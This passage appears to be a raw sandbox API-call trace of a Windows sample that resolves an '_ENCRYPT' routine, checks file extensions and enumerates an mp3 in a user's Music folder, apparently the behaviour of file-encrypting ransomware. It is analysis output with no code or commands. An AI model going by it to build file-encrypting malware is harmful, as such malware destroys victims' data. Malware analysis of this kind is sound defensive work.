Flags=0x0, Size=0x4) returned 0x8e1890 [0181.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0181.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.619] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0181.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0181.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0181.620] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0181.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0181.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0181.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0181.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0181.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0181.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0181.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0181.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.621] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0181.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0181.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0181.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0181.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0181.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0181.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0181.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0181.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.622] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0181.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0181.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9e38 [0181.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9e38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0181.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.623] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0181.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0181.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0181.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0181.623] CloseHandle (hObject=0x120) returned 1 [0181.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0181.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0181.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0181.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0181.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0181.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0181.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0181.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0181.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0181.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0181.624] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0181.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.624] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0181.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0181.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0181.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0181.625] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0181.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0181.625] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0181.625] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0181.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0181.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.625] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0181.625] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0181.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0181.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0181.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0181.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0181.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0181.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.625] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0181.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0181.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0181.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0181.626] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0181.626] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.626] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf96d1f10, ftCreationTime.dwHighDateTime=0x1d5ddcd, ftLastAccessTime.dwLowDateTime=0xc516f910, ftLastAccessTime.dwHighDateTime=0x1d5e463, ftLastWriteTime.dwLowDateTime=0xc516f910, ftLastWriteTime.dwHighDateTime=0x1d5e463, nFileSizeHigh=0x0, nFileSizeLow=0xcb34, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="AXe49W4a SJDN r.mp3", cAlternateFileName="AXE49W~1.MP3")) returned 0x90add8 [0181.627] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0181.627] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.627] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf96d1f10, ftCreationTime.dwHighDateTime=0x1d5ddcd, ftLastAccessTime.dwLowDateTime=0xc516f910, ftLastAccessTime.dwHighDateTime=0x1d5e463, ftLastWriteTime.dwLowDateTime=0xc516f910, ftLastWriteTime.dwHighDateTime=0x1d5e463, nFileSizeHigh=0x0, nFileSizeLow=0xcb34, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="AXe49W4a SJDN r.mp3", cAlternateFileName="AXE49W~1.MP3")) returned 0x90add8 [0181.628] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0181.628] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, 